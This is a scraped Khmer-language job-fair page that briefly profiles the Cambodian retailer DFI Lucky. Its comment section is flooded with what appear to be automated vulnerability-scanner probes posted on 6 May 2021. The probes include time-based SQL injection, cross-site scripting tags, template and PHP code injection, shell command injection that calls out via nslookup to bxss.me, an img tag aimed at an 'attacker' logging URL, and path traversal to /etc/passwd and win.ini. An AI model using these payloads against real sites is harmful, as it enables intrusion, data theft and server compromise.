ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ឌី អេហ្វ អាយ ឡាក់គី ប្រាយវេត លីមីធីត
ក្រុមហ៊ុន ឌី អេហ្វ អាយ ឡាក់គី ប្រាយវេត លីមីធីត គឺជាសមាជិករបស់ក្រុមហ៊ុន ឌែរី ហ្វាម​អ៊ិនធឺណេសិនណល ដែលជាក្រុមហ៊ុនលក់រាយធំបំផុតនៅអាស៊ី។​ នៅកម្ពុជា ឌី អេហ្វ អាយ​​​​ឡាក់គី​​​បាននឹងកំពុងដំណើរការ​ផ្សារទំនើបជាច្រើនដូចជាផ្សារទំនើបឡាក់គីព្រីមមៀម (Lucky Premium) ផ្សារទំនើបឡាក់គី (Lucky Supermarket) ផ្សារទំនើបឡាក់គី អ៊ិចប្រេស៍ (Lucky Express)​ បន្ថែមលើនេះទៅទៀត ឌី អេហ្វ អាយ ឡាក់គី ក៏មានផ្នែកថែទាំសម្រស់នឹងសុខភាពដែលមានយីហោថា ហ្គាឌៀន (Guardian)។​ បច្ចុប្បន្ឋយើងមានក្រុមការងារច្រើនជាងមួយពាន់អ្នក ដែលកំពុងបម្រើការងារ និង អភិវឌ្ឍការងាររបស់ខ្លួន។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 127

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 133 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 08:56:52


  @@hAHeF


 • pHqghUme

  2021-05-06 08:56:47


  1'"


 • pHqghUme

  2021-05-06 08:56:46


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 08:56:35


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 08:56:24


  IzsYFy8W')) OR 378=(SELECT 378 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:56:14


  AZCQfZgZ') OR 115=(SELECT 115 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:56:02


  QQps5HgM' OR 619=(SELECT 619 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:55:53


  -1)) OR 902=(SELECT 902 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:55:45


  -5) OR 205=(SELECT 205 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:55:38


  -5 OR 775=(SELECT 775 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:55:30


  4avn8r42'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:55:20


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:55:10


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:54:53


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:54:37


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:54:20


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:54:03


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:53:44


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:53:24


  -1" OR 2+929-929-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:53:23


  -1' OR 2+131-131-1=0+0+0+1 or 'dZOUWpEc'='


 • pHqghUme

  2021-05-06 08:53:22


  -1' OR 2+680-680-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:53:21


  -1 OR 2+590-590-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:53:20


  -1 OR 2+42-42-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:53:18


  wjTnaUnb


 • pHqghUme

  2021-05-06 08:52:57


  1


 • pHqghUme

  2021-05-06 08:52:30


  1


 • @@dM5u5

  2021-05-06 08:52:09


  1


 • 1'"

  2021-05-06 08:52:04


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 08:52:03


  1


 • 5SUbIuIb')) OR 46=(SELECT 46 FROM PG_SLEEP(15))--

  2021-05-06 08:51:42


  1


 • KY3U37EP') OR 402=(SELECT 402 FROM PG_SLEEP(15))--

  2021-05-06 08:51:19


  1


 • ERSeRgL0' OR 531=(SELECT 531 FROM PG_SLEEP(15))--

  2021-05-06 08:51:03


  1


 • kHkdPNR9'; waitfor delay '0:0:15' --

  2021-05-06 08:50:47


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 08:50:32


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 08:50:12


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 08:49:56


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 08:49:37


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 08:49:21


  1


 • -1" OR 2+488-488-1=0+0+0+1 --

  2021-05-06 08:49:04


  1


 • -1' OR 2+977-977-1=0+0+0+1 or 'DVosi8Eg'='

  2021-05-06 08:49:03


  1


 • -1' OR 2+692-692-1=0+0+0+1 --

  2021-05-06 08:49:02


  1


 • -1 OR 2+223-223-1=0+0+0+1

  2021-05-06 08:49:01


  1


 • -1 OR 2+419-419-1=0+0+0+1 --

  2021-05-06 08:49:00


  1


 • zHNBA5Ao

  2021-05-06 08:48:59


  1


 • pHqghUme

  2021-05-06 08:48:43


  1


 • pHqghUme

  2021-05-06 08:48:26


  1


 • pHqghUme

  2021-05-06 08:48:07


  1


 • pHqghUme

  2021-05-06 08:48:04


  1


 • pHqghUme

  2021-05-06 08:48:03


  1


 • pHqghUme

  2021-05-06 08:47:47


  1


 • pHqghUme

  2021-05-06 08:47:29


  1


 • pHqghUme

  2021-05-06 08:47:10


  1


 • pHqghUme

  2021-05-06 08:46:51


  1


 • pHqghUme

  2021-05-06 08:46:36


  1


 • pHqghUme

  2021-05-06 08:46:19


  1


 • pHqghUme

  2021-05-06 08:46:04


  1


 • pHqghUme

  2021-05-06 08:45:48


  1<eHObxl<


 • pHqghUme

  2021-05-06 08:45:42


  1<img sRc='http://attacker-9475/log.php?


 • pHqghUme

  2021-05-06 08:45:38


  1


 • pHqghUme

  2021-05-06 08:45:36


  1<AtZGVS x=9359>


 • pHqghUme

  2021-05-06 08:45:24


  1<ifRAme sRc=9198.com></IfRamE>


 • pHqghUme

  2021-05-06 08:45:17


  1<WUJU3N>ABA3I[!+!]</WUJU3N>


 • pHqghUme

  2021-05-06 08:45:14


  1


 • pHqghUme

  2021-05-06 08:45:10


  1U0jVl <ScRiPt >j1nj(9470)</ScRiPt>


 • pHqghUme

  2021-05-06 08:45:05


  1<% contenteditable onresize=j1nj(9546)>


 • pHqghUme

  2021-05-06 08:44:59


  1}body{acu:Expre/**/SSion(j1nj(9836))}


 • pHqghUme

  2021-05-06 08:44:53


  1


 • pHqghUme

  2021-05-06 08:44:53


  1


 • pHqghUme

  2021-05-06 08:44:52


  1


 • pHqghUme

  2021-05-06 08:44:51


  1


 • pHqghUme

  2021-05-06 08:44:51


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 08:44:50


  1


 • pHqghUme

  2021-05-06 08:44:49


  1


 • pHqghUme

  2021-05-06 08:44:42


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 08:44:33


  1<input autofocus onfocus=j1nj(9510)>


 • pHqghUme

  2021-05-06 08:44:25


  1


 • pHqghUme

  2021-05-06 08:44:23


  1&lt;ScRiPt&gt;j1nj(9192)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 08:44:17


  1\u003CScRiPt\j1nj(9371)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 08:44:10


  %31%3C%53%63%52%69%50%74%20%3E%6A%31%6E%6A%289270%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 08:44:06


  1


 • pHqghUme

  2021-05-06 08:44:03


  1<img/src=">" onerror=alert(9656)>


 • pHqghUme

  2021-05-06 08:43:55


  1<img src=xyz OnErRor=j1nj(9065)>


 • pHqghUme

  2021-05-06 08:43:52


  1


 • pHqghUme

  2021-05-06 08:43:48


  1


 • pHqghUme

  2021-05-06 08:43:48


  1


 • pHqghUme

  2021-05-06 08:43:46


  1<img src=//xss.bxss.me/t/dot.gif onload=j1nj(9249)>


 • pHqghUme

  2021-05-06 08:43:40


  1<body onload=j1nj(9388)>


 • pHqghUme

  2021-05-06 08:43:33


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9911'>


 • pHqghUme

  2021-05-06 08:43:31


  1


 • pHqghUme

  2021-05-06 08:43:26


  1<isindex type=image src=1 onerror=j1nj(9812)>


 • pHqghUme

  2021-05-06 08:43:16


  1<ScRiPt >j1nj(9689)</ScRiPt>


 • pHqghUme

  2021-05-06 08:43:13


  1


 • pHqghUme

  2021-05-06 08:43:10


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9419></ScRiPt>


 • pHqghUme

  2021-05-06 08:43:02


  1<ScRiPt >j1nj(9791)</ScRiPt>


 • pHqghUme

  2021-05-06 08:42:55


  1


 • pHqghUme

  2021-05-06 08:42:51


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6A%31%6E%6A%28%39%33%33%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 08:42:43


  1<script>j1nj(9675)</script>


 • pHqghUme

  2021-05-06 08:42:36


  1<WMTXPP>UZHR6[!+!]</WMTXPP>


 • pHqghUme

  2021-05-06 08:42:32


  1


 • pHqghUme

  2021-05-06 08:42:30


  1<ScRiPt >j1nj(9515)</ScRiPt>


 • pHqghUme

  2021-05-06 08:42:23


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 08:42:16


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 08:42:10


  1


 • pHqghUme

  2021-05-06 08:42:09


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 08:42:02


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 08:41:53


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:41:51


  1


 • pHqghUme

  2021-05-06 08:41:41


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 08:41:31


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:41:29


  1


 • pHqghUme

  2021-05-06 08:41:22


  acux1340%C0%BEz1%C0%BCz2a%90bcxuca1340


 • pHqghUme

  2021-05-06 08:41:16


  acu2518%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2518


 • pHqghUme

  2021-05-06 08:41:08


  19810442


 • pHqghUme

  2021-05-06 08:41:07


  1


 • pHqghUme

  2021-05-06 08:41:02


  '"()&%<acx><ScRiPt >j1nj(9473)</ScRiPt>


 • pHqghUme

  2021-05-06 08:40:55


  1'"()&%<acx><ScRiPt >j1nj(9852)</ScRiPt>


 • pHqghUme<UQL6xJ<

  2021-05-06 08:40:49


  1


 • pHqghUme

  2021-05-06 08:40:47


  1


 • pHqghUme<img sRc='http://attacker-9425/log.php?

  2021-05-06 08:40:42


  1


 • pHqghUme<zQi9bC x=9691>

  2021-05-06 08:40:37


  1


 • pHqghUme<ifRAme sRc=9601.com></IfRamE>

  2021-05-06 08:40:31


  1


 • pHqghUme

  2021-05-06 08:40:27


  1


 • pHqghUme

  2021-05-06 08:40:27


  1


 • pHqghUme

  2021-05-06 08:40:26


  1


 • pHqghUme

  2021-05-06 08:40:25


  1


 • pHqghUme

  2021-05-06 08:40:24


  1


 • pHqghUme

  2021-05-06 08:40:24


  1


 • pHqghUme<WJPER5>TTVT0[!+!]</WJPER5>

  2021-05-06 08:40:20


  1


 • pHqghUmeLVAFO <ScRiPt >j1nj(9358)</ScRiPt>

  2021-05-06 08:40:15


  1


 • pHqghUme<% contenteditable onresize=j1nj(9267)>

  2021-05-06 08:40:09


  1


 • pHqghUme}body{acu:Expre/**/SSion(j1nj(9665))}

  2021-05-06 08:39:59


  1


 • pHqghUme

  2021-05-06 08:39:55


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 08:39:52


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 08:39:44


  1


 • pHqghUme

  2021-05-06 08:39:36


  1


 • pHqghUme<input autofocus onfocus=j1nj(9393)>

  2021-05-06 08:39:33


  1


 • pHqghUme&lt;ScRiPt&gt;j1nj(9240)&lt;/sCripT&gt;

  2021-05-06 08:39:25


  1


 • pHqghUme\u003CScRiPt\j1nj(9606)\u003C/sCripT\u003E

  2021-05-06 08:39:16


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%6A%31%6E%6A%289602%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 08:39:10


  1


 • pHqghUme<img/src=">" onerror=alert(9362)>

  2021-05-06 08:39:02


  1


 • pHqghUme<img src=xyz OnErRor=j1nj(9482)>

  2021-05-06 08:38:57


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=j1nj(9787)>

  2021-05-06 08:38:50


  1


 • pHqghUme<body onload=j1nj(9947)>

  2021-05-06 08:38:43


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9044'>

  2021-05-06 08:38:35


  1


 • pHqghUme<isindex type=image src=1 onerror=j1nj(9486)>

  2021-05-06 08:38:29


  1


 • pHqghUme<ScRiPt >j1nj(9067)</ScRiPt>

  2021-05-06 08:38:14


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9885></ScRiPt>

  2021-05-06 08:38:10


  1


 • pHqghUme<ScRiPt >j1nj(9497)</ScRiPt>

  2021-05-06 08:38:03


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6A%31%6E%6A%28%39%39%39%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 08:37:57


  1


 • pHqghUme<script>j1nj(9935)</script>

  2021-05-06 08:37:52


  1


 • pHqghUme<WV85OZ>WY7EU[!+!]</WV85OZ>

  2021-05-06 08:37:48


  1


 • pHqghUme<ScRiPt >j1nj(9667)</ScRiPt>

  2021-05-06 08:37:43


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 08:37:36


  1


 • acx__${98991*97996}__::.x

  2021-05-06 08:37:29


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 08:37:22


  1


 • acx{{98991*97996}}xca

  2021-05-06 08:37:17


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 08:37:10


  1


 • <th:t="${acx}#foreach

  2021-05-06 08:37:01


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 08:36:55


  1


 • acux3764%C0%BEz1%C0%BCz2a%90bcxuca3764

  2021-05-06 08:36:50


  1


 • acu1968%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1968

  2021-05-06 08:36:45


  1


 • pHqghUme9318220

  2021-05-06 08:36:38


  1


 • '"()&%<acx><ScRiPt >j1nj(9086)</ScRiPt>

  2021-05-06 08:36:31


  1


 • pHqghUme'"()&%<acx><ScRiPt >j1nj(9134)</ScRiPt>

  2021-05-06 08:36:26


  1


 • pHqghUme

  2021-05-06 08:36:20


  1


 • pHqghUme

  2021-05-06 08:36:13


  1


 • pHqghUme

  2021-05-06 08:36:08


  1


 • pHqghUme

  2021-05-06 08:36:00


  1


 • pHqghUme

  2021-05-06 08:35:55


  1


 • pHqghUme

  2021-05-06 08:35:53


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 08:35:53


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 08:35:52


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 08:35:52


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 08:35:51


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 08:35:51


  ';print(md5(31337));$a='


 • ${@print(md5(31337))}\

  2021-05-06 08:35:50


  1


 • pHqghUme

  2021-05-06 08:35:50


  1


 • '.print(md5(31337)).'

  2021-05-06 08:35:50


  1


 • ";print(md5(31337));$a="

  2021-05-06 08:35:49


  1


 • ${@print(md5(31337))}

  2021-05-06 08:35:49


  1


 • ';print(md5(31337));$a='

  2021-05-06 08:35:48


  1


 • pHqghUme

  2021-05-06 08:35:47


  1


 • pHqghUme

  2021-05-06 08:35:47


  '"


 • pHqghUme

  2021-05-06 08:35:47


  1


 • pHqghUme

  2021-05-06 08:35:47


  <!--


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 08:35:47


  1


 • '"

  2021-05-06 08:35:46


  1


 • pHqghUme

  2021-05-06 08:35:46


  1


 • <!--

  2021-05-06 08:35:46


  1


 • pHqghUme

  2021-05-06 08:35:45


  1


 • pHqghUme

  2021-05-06 08:35:45


  1


 • pHqghUme

  2021-05-06 08:35:45


  1


 • pHqghUme

  2021-05-06 08:35:44


  1


 • pHqghUme

  2021-05-06 08:35:44


  1


 • pHqghUme

  2021-05-06 08:35:43


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 08:35:43


  1


 • pHqghUme

  2021-05-06 08:35:43


  1


 • /xfs.bxss.me

  2021-05-06 08:35:42


  1


 • pHqghUme

  2021-05-06 08:35:42


  1


 • pHqghUme

  2021-05-06 08:35:42


  1


 • pHqghUme

  2021-05-06 08:35:41


  1


 • pHqghUme

  2021-05-06 08:35:41


  '+'A'.concat(70-3).concat(22*4).concat(110).concat(86).concat(116).concat(66)+(require'socket' Socket.gethostbyname('hitvx'+'awowrawhaca23.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 08:35:41


  1


 • '+'A'.concat(70-3).concat(22*4).concat(105).concat(87).concat(113).concat(79)+(require'socket' Socket.gethostbyname('hitks'+'gnczldff9e19f.bxss.me.')[3].to_s)+'

  2021-05-06 08:35:40


  1


 • pHqghUme

  2021-05-06 08:35:40


  1


 • pHqghUme

  2021-05-06 08:35:40


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 08:35:40


  1


 • pHqghUme

  2021-05-06 08:35:40


  "+"A".concat(70-3).concat(22*4).concat(120).concat(80).concat(117).concat(68)+(require"socket" Socket.gethostbyname("hitjx"+"dpeewkno9d754.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 08:35:39


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 08:35:39


  1


 • pHqghUme

  2021-05-06 08:35:38


  '"()


 • pHqghUme

  2021-05-06 08:35:38


  1


 • pHqghUme

  2021-05-06 08:35:38


  1


 • "+"A".concat(70-3).concat(22*4).concat(114).concat(69).concat(114).concat(87)+(require"socket" Socket.gethostbyname("hitfz"+"hrtofzckf5c52.bxss.me.")[3].to_s)+"

  2021-05-06 08:35:38


  1


 • pHqghUme

  2021-05-06 08:35:37


  1


 • pHqghUme

  2021-05-06 08:35:37


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:35:37


  1


 • pHqghUme

  2021-05-06 08:35:37


  1


 • pHqghUme

  2021-05-06 08:35:37


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:35:36


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 08:35:36


  1


 • pHqghUme

  2021-05-06 08:35:35


  1


 • pHqghUme

  2021-05-06 08:35:35


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 08:35:35


  1


 • pHqghUme

  2021-05-06 08:35:34


  1


 • '"()

  2021-05-06 08:35:34


  1


 • pHqghUme

  2021-05-06 08:35:33


  1


 • pHqghUme

  2021-05-06 08:35:33


  1


 • pHqghUme

  2021-05-06 08:35:31


  1


 • pHqghUme

  2021-05-06 08:35:30


  `(nslookup hitqfnffkhnmo5904d.bxss.me||perl -e "gethostbyname('hitqfnffkhnmo5904d.bxss.me')")`


 • pHqghUme

  2021-05-06 08:35:30


  ".gethostbyname(lc("hitrv"."tsndexvv6a7d4.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(73).chr(113).chr(81)."


 • pHqghUme

  2021-05-06 08:35:30


  1&n933907=v933816


 • ".gethostbyname(lc("hitnk"."uigjghoq981c9.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(76).chr(102).chr(75)."

  2021-05-06 08:35:29


  1


 • pHqghUme

  2021-05-06 08:35:29


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 08:35:29


  |(nslookup hitueeuoaobbue1a24.bxss.me||perl -e "gethostbyname('hitueeuoaobbue1a24.bxss.me')")


 • pHqghUme

  2021-05-06 08:35:29


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 08:35:29


  '.gethostbyname(lc('hitqb'.'msznozqv3f643.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(86).chr(107).chr(70).'


 • '.gethostbyname(lc('hitpx'.'qptofknq7f1ac.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(67).chr(98).chr(84).'

  2021-05-06 08:35:28


  1


 • pHqghUme

  2021-05-06 08:35:28


  )


 • !(()&&!|*|*|

  2021-05-06 08:35:27


  1


 • pHqghUme

  2021-05-06 08:35:27


  1


 • pHqghUme

  2021-05-06 08:35:27


  1


 • pHqghUme

  2021-05-06 08:35:27


  1


 • ^(#$!@#$)(()))******

  2021-05-06 08:35:27


  1


 • pHqghUme

  2021-05-06 08:35:25


  1


 • pHqghUme

  2021-05-06 08:35:25


  1


 • pHqghUme

  2021-05-06 08:35:25


  $(nslookup hitubmtrxdfhlf8f8e.bxss.me||perl -e "gethostbyname('hitubmtrxdfhlf8f8e.bxss.me')")


 • )

  2021-05-06 08:35:25


  1


 • pHqghUme

  2021-05-06 08:35:25


  1


 • pHqghUme

  2021-05-06 08:35:24


  |echo zwvece$()\ xeedmp\nz^xyu||a #' |echo zwvece$()\ xeedmp\nz^xyu||a #|" |echo zwvece$()\ xeedmp\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:35:24


  1


 • pHqghUme&n965762=v918940

  2021-05-06 08:35:24


  1


 • pHqghUme

  2021-05-06 08:35:24


  (nslookup hitryfgxyhaum474b0.bxss.me||perl -e "gethostbyname('hitryfgxyhaum474b0.bxss.me')")


 • pHqghUme

  2021-05-06 08:35:23


  1


 • pHqghUme

  2021-05-06 08:35:23


  &echo uaoufq$()\ xcevhw\nz^xyu||a #' &echo uaoufq$()\ xcevhw\nz^xyu||a #|" &echo uaoufq$()\ xcevhw\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:35:23


  1


 • pHqghUme

  2021-05-06 08:35:22


  1


 • pHqghUme

  2021-05-06 08:35:22


  echo equcjq$()\ jmhaag\nz^xyu||a #' &echo equcjq$()\ jmhaag\nz^xyu||a #|" &echo equcjq$()\ jmhaag\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:35:21


  bxss.me


 • pHqghUme

  2021-05-06 08:35:21


  1


 • pHqghUme

  2021-05-06 08:35:21


  1


 • pHqghUme

  2021-05-06 08:35:20


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 08:35:20


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 08:35:19


  1some_inexistent_file_with_long_name%00.jpg


 • `(nslookup hitakkhakrwja460d3.bxss.me||perl -e "gethostbyname('hitakkhakrwja460d3.bxss.me')")`

  2021-05-06 08:35:19


  1


 • pHqghUme

  2021-05-06 08:35:19


  Http://bxss.me/t/fit.txt


 • bxss.me

  2021-05-06 08:35:18


  1


 • pHqghUme

  2021-05-06 08:35:18


  1


 • pHqghUme

  2021-05-06 08:35:18


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • |(nslookup hitscmaarovri888a2.bxss.me||perl -e "gethostbyname('hitscmaarovri888a2.bxss.me')")

  2021-05-06 08:35:18


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 08:35:17


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 08:35:16


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 08:35:16


  1


 • (nslookup hitvcxmfcveim90ded.bxss.me||perl -e "gethostbyname('hitvcxmfcveim90ded.bxss.me')")

  2021-05-06 08:35:15


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 08:35:15


  1


 • $(nslookup hitvczbkbpobg5d551.bxss.me||perl -e "gethostbyname('hitvczbkbpobg5d551.bxss.me')")

  2021-05-06 08:35:15


  1


 • pHqghUme

  2021-05-06 08:35:14


  1


 • &echo owiiid$()\ cemdqk\nz^xyu||a #' &echo owiiid$()\ cemdqk\nz^xyu||a #|" &echo owiiid$()\ cemdqk\nz^xyu||a #

  2021-05-06 08:35:14


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 08:35:14


  1


 • pHqghUme

  2021-05-06 08:35:14


  1


 • |echo trjovk$()\ lnfkfn\nz^xyu||a #' |echo trjovk$()\ lnfkfn\nz^xyu||a #|" |echo trjovk$()\ lnfkfn\nz^xyu||a #

  2021-05-06 08:35:14


  1


 • pHqghUme

  2021-05-06 08:35:14


  1


 • pHqghUme

  2021-05-06 08:35:13


  1


 • pHqghUme

  2021-05-06 08:35:13


  1


 • echo sucvga$()\ fehmzv\nz^xyu||a #' &echo sucvga$()\ fehmzv\nz^xyu||a #|" &echo sucvga$()\ fehmzv\nz^xyu||a #

  2021-05-06 08:35:13


  1


 • pHqghUme

  2021-05-06 08:35:12


  1


 • pHqghUme

  2021-05-06 08:35:12


  1


 • pHqghUme

  2021-05-06 08:35:11


  1


 • pHqghUme

  2021-05-06 08:35:10


  1


 • pHqghUme

  2021-05-06 08:35:10


  1


 • pHqghUme

  2021-05-06 08:35:10


  1


 • pHqghUme

  2021-05-06 08:35:10


  1


 • pHqghUme

  2021-05-06 08:35:09


  1


 • pHqghUme

  2021-05-06 08:35:08


  1


 • MmU0cGZPaVc=

  2021-05-06 08:35:07


  1


 • pHqghUme

  2021-05-06 08:35:07


  1


 • pHqghUme

  2021-05-06 08:35:06


  1


 • pHqghUme

  2021-05-06 08:35:05


  1


 • pHqghUme

  2021-05-06 08:35:05


  1


 • pHqghUme

  2021-05-06 08:35:04


  1


 • pHqghUme

  2021-05-06 08:35:04


  ../1


 • pHqghUme

  2021-05-06 08:35:03


  ${9999931+10000128}


 • pHqghUme

  2021-05-06 08:35:03


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 08:35:03


  1


 • ../pHqghUme

  2021-05-06 08:35:02


  1


 • ${9999906+9999001}

  2021-05-06 08:35:02


  1


 • pHqghUme

  2021-05-06 08:35:02


  1


 • pHqghUme

  2021-05-06 08:35:02


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 08:35:01


  1


 • pHqghUme

  2021-05-06 08:35:01


  1


 • pHqghUme

  2021-05-06 08:35:01


  1


 • pHqghUme

  2021-05-06 08:35:00


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 08:35:00


  1


 • pHqghUme

  2021-05-06 08:35:00


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 08:35:00


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 08:34:59


  1


 • pHqghUme

  2021-05-06 08:34:59


  1


 • pHqghUme

  2021-05-06 08:34:59


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 08:34:59


  1


 • pHqghUme

  2021-05-06 08:34:58


  1


 • pHqghUme

  2021-05-06 08:34:58


  1


 • pHqghUme

  2021-05-06 08:34:58


  1


 • pHqghUme

  2021-05-06 08:34:58


  1


 • pHqghUme

  2021-05-06 08:34:58


  1


 • pHqghUme

  2021-05-06 08:34:57


  1


 • pHqghUme

  2021-05-06 08:34:57


  1


 • pHqghUme

  2021-05-06 08:34:57


  1


 • pHqghUme

  2021-05-06 08:34:56


  1


 • pHqghUme

  2021-05-06 08:34:56


  1


 • pHqghUme

  2021-05-06 08:34:55


  1


 • pHqghUme

  2021-05-06 08:34:55


  1


 • pHqghUme

  2021-05-06 08:34:54


  1


 • pHqghUme

  2021-05-06 08:34:54


  1


 • pHqghUme

  2021-05-06 08:34:54


  1


 • pHqghUme

  2021-05-06 08:34:53


  1


 • pHqghUme

  2021-05-06 08:34:50


  1


 • pHqghUme

  2021-05-06 08:34:49


  W88yOZDh


 • pHqghUme

